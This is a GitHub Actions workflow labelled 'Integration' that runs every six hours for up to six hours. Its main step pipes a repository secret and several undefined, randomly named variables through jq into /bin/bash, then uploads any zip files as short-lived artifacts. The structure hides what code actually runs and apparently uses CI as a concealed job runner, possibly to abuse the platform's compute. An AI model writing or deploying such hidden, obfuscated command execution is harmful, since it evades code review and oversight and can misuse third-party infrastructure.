name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '36 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          sgmf051: ${{ secrets.sgmf051 }}
        run: |
          printf '%s' "$sgmf051" | jq -r .v8546 | /bin/bash
          printf '%s' "$smrez99528" | jq -r .rz79991 | /bin/bash
          echo $ib6925 | jq -r .ua622 | /bin/bash
          echo $ykdhm129 | jq -r .qjw6 | /bin/bash
          printf '%s' "$drc20861" | jq -r .tyt02 | /bin/bash
          echo $rmhj0489 | jq -r .aotmg93334 | /bin/bash
          echo $u73650 | jq -r .xf34041 | /bin/bash
          echo $sdmo53932 | jq -r .fipqa1085 | /bin/bash
          echo $ori71 | jq -r .duz3 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 1ULcNkEi
          path: "*.zip"
          retention-days: 1
